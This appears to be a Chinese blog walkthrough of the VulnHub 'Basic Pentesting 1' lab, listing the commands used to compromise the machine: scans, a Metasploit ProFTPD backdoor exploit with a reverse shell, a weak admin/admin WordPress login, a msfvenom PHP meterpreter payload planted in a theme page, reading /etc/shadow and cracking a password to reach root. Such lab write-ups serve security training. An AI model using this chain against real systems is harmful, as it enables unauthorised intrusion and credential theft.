漏洞复现 -- Basic penetration

最新推荐文章于 2024-08-03 07:21:58 发布
最新推荐文章于 2024-08-03 07:21:58 发布
阅读量190 收藏
点赞数 3
文章标签: 网络安全 安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80854251/article/details/140041873
版权

一、靶机地址

https://www.vulnhub.com/entry/basic-pentesting-1,216/#download

二、漏洞复现

sudo arp-scan -l

nmap -A -p- 192.168.159.159 --min-rate=5000

searchsploit ProFTPD 1.3.3c
searchsploit OpenSSH 7.2p2

msfconsole
search ProFTPD 1.3.3c

use exploit/unix/ftp/proftpd_133c_backdoor
set rhost 192.168.159.159
set lhost 192.168.159.128
set payload cmd/unix/reverse
run

dirb http://192.168.159.159

http://192.168.159.159/secret/wp-login.php

使用弱口令登录 
admin | admin

使用msfvenom生成监听木马

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.159.128 lport=3444 -f raw

在404.php界面插入监听木马

msfconsole
use exploit/multi/handler
show options
set payload php/meterpreter/reverse_tcp
set lport 3444
set lhost 192.168.159.128
run

访问错误路径,成功得到会话
http://vtcsec/secret/?p=1111

python -c 'import pty; pty.spawn("/bin/bash")'

shell
ls
cd /etc
cat /etc/shadow

marlinspike:$6$wQb5nV3T$xB2WO/jOkbn4t1RUILrckw69LR/0EMtUbFFCYpM3MUHVmtyYW9.ov/aszTpWhLaC2x6Fvy5tpUUxQb
破解密码
marlinspike:marlinspike
su marlinspike
sudo -l
sudo su

冷酷小帅~0x7e
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[网络安全自学篇] 六十六.Vulnhub靶机渗透之DC-1提权和Drupal漏洞利用(二)
杨秀璋的专栏
04-11 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。本文将讲解DC-1提权和Drupal漏洞利用,通过信息收集、CMS漏洞搜索、Metasploit反弹shell、提权及数据库爆破获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
对Linux 提权的简单总结
CanMeng'Blog - 一个WEB安全渗透的技术爱好者
11-30 872
什么是权限 在Linux 系统中,ls -al即可查看列出文件所属的权限。这里我用kali 系统来演示。 …… drwxr-xr-x 2 kali kali 4096 Jan 27 12:52 Downloads -rw-r--r-- 1 root root 903 Jun 14 11:33 exp.html -rw-r--r-- 1 root root 153600 May 5 09:42 flag lrwxrwxrwx 1 kali kali 28 May 1.
漏洞复现】RTF URL Moniker 的逻辑漏洞 | OLE2Link 漏洞(CVE-2017-0199)
VI___
01-07 1497
一、CVE-2017-0199——类型:OLE对象中的逻辑漏洞 原理:漏洞利用 OFFICEOLE 对象链接技术,将恶意链接对象嵌入在文档中,之后调用 URLMoniker 将恶意链接中的 HTA 文件下载到本地,URLMoniker 通过识别响应头中 content-type 的字段,最终调用 mshta.exe 执行 HTA 文件中的攻击代码。攻击者通过该漏洞可以控制受影响的系统,对受...
CVE-2017-0199漏洞分析
一半西瓜的博客
04-17 4523
OFFICE OLE2LINK(CVE-2017-0199) 第一部分 OFFICE漏洞简介 1.1 微软office漏洞背景 1.2OFFICE OLE2LINK漏洞简介 第二部分 OFFICE OLE2LINK漏洞分析 2.1漏洞原理简单分析 2.2漏洞攻击原理简单图解 2.3相关知识介绍 第三部分 攻击代码分析 3.1 ms.rtf 3.2 配置文件 第四部分 利用复现过程 第五部分 攻击总结 参考资料
[Vulnhub] basic_pentesting 2
weixin_63231007的博客
07-12 690
目录信息搜集 S2-052漏洞利用 Hydra爆破jan密码(1) vim读取密码 (2) ssh公钥私钥获取身份登录凭据下载链接:Basic Pentesting: 2 ~ VulnHubnmap -sP 192.168.236.0/24 扫描一下靶机ipnetdiscover -i eth0 -r 192.168.1.0/24靶机ip : 192.168.236.138nmap -A 192.168.236.138 扫描一下靶机的具体信息。 收集靶场环境的服务和端口信息我们可以看见139和4...
Notes Fifteenth Day-渗透攻击-红队-内部信息搜集
热门推荐
qq_34801745的博客
10-01 1万+
** Notes Fifteenth Day-渗透攻击-红队-打入内网(dayu) ** 作者:大余 时间:2020-10-1 请注意:对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。 我必须再重申一遍:务必不要做未授权测试!不要未经授权在真实网络环境中复现任何本书中描述的攻击。即使是出于好奇而不是恶意,你仍然会因未授权测试行为而陷入很多麻烦。为了个人能更
Notes Twelfth Day-渗透攻击-红队-命令与控制
qq_34801745的博客
09-28 7698
** Notes Twelfth Day-渗透攻击-红队-打入内网(dayu) ** 作者:大余 时间:2020-09-28 请注意:对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。 我必须再重申一遍:务必不要做未授权测试!不要未经授权在真实网络环境中复现任何本书中描述的攻击。即使是出于好奇而不是恶意,你仍然会因未授权测试行为而陷入很多麻烦。为了个人能更好
Notes Ninth Day-渗透攻击-红队-打入内网
qq_34801745的博客
09-25 8120
** Notes Ninth Day-渗透攻击-红队-打入内网(dayu) ** 作者:大余 时间:2020-09-25 请注意:对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。 我必须再重申一遍:务必不要做未授权测试!不要未经授权在真实网络环境中复现任何本书中描述的攻击。即使是出于好奇而不是恶意,你仍然会因未授权测试行为而陷入很多麻烦。为了个人能更好的继
如何利用PHP-FPM实现open_basedir绕过
蚁景网安学院
09-20 370
0X00 安装模式在PHP中有以下几种常见的安装模式:1. CGI模式CGI是通用网关接口,HTTP服务器使用这样的接口程序来调用外部程序,外部程序可以使用任何计算机语言来编写,例如C,...
15-PENETRATION.rar
04-30
"15-PENETRATION.rar"这个压缩包显然包含了与LS-DYNA相关的侵彻模拟案例。 在LS-DYNA中,"侵彻"通常指的是一个物体(如子弹或碎片)穿透另一个物体的过程。这个过程涉及到材料的塑性变形、动态响应以及能量传递等多...
penetration-testing-with-kali.pdf官方最新大纲
06-01
penetration-testing-with-kali.pdf官方最新大纲,不包含具体内容
Android-Penetration-Testing
04-22
该备忘单专为Bug赏金猎人和渗透测试人员而设计,旨在帮助他们在Android应用程序和设备上寻找漏洞。 它的设计使初学者可以了解基础知识,而专业人士可以使用高级选项来提高自己的技能。 有多种方法可以执行所有提到的...
cloud-penetration-testing-playbook.pdf
04-23
本文档,"cloud-penetration-testing-playbook.pdf",专注于网络安全领域,特别是云环境的安全性。云渗透测试是评估云服务安全性的关键方法,它旨在识别和利用潜在的安全漏洞,以便组织可以采取措施进行修复,防止...
Learning-Penetration-Testing-with-Python.pdf.pdf
09-13
Learning-Penetration-Testing-with-Python.pdf
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8362
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
科普文:Linux系统安全加固指南
为无为,事无事,味无味。
07-25 1744
本指南仅关注安全性和隐私性,而不关注性能,可用性或其他内容。列出的所有命令都将需要root特权。以“$”符号开头的单词表示一个变量,不同终端之间可能会有所不同。选择一个好的Linux发行版有很多因素。避免分发冻结程序包,因为它们在安全更新中通常很落后不使用与Systemd机制的发行版。Systemd包含许多不必要的攻击面;它尝试做的事情远远超出了必要,并且超出了初始化系统应做的事情。使用musl作为默认的C库。
读零信任网络:在不可信网络中构建安全系统07设备信任
最新发布
lyingSeven的博客
08-03 597
设备安全
penetration2d-ale.k
10-01
penetration2d-ale.k是一种基于ALE(Arbitrary Lagrangian Eulerian)方法的二维穿透模拟算法。在计算机图形学中,穿透是指当两个物体在进行碰撞时,有一部分或全部的物体穿过了另一个物体。 penetration2d-ale.k的算法通过模拟物体的运动和碰撞响应,来准确地计算出穿透情况,并进行修复。它综合运用了ALE方法中的拉格朗日法和欧拉法。 在运动模拟中,拉格朗日法使用物体的质心来描述其位置和速度。它根据物体的动力学方程进行迭代计算,并更新物体的位置和速度。而欧拉法将物体划分为网格,通过离散化各个网格点的状态来模拟物体的运动。 在碰撞检测与响应中,penetration2d-ale.k算法会检测物体之间的碰撞关系,并根据模拟的结果确定物体的穿透情况。一旦发现穿透,算法会计算出穿透的深度和方向,并对物体进行相应的修复,使其脱离穿透状态,恢复到合理的位置和形状。 penetration2d-ale.k算法的目的是提供一种高效、准确的二维穿透模拟方法,用于解决物体碰撞时可能出现的穿透问题。它在计算机动画、虚拟现实等领域有着广泛的应用,可以提高物体碰撞模拟的真实性和视觉效果。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值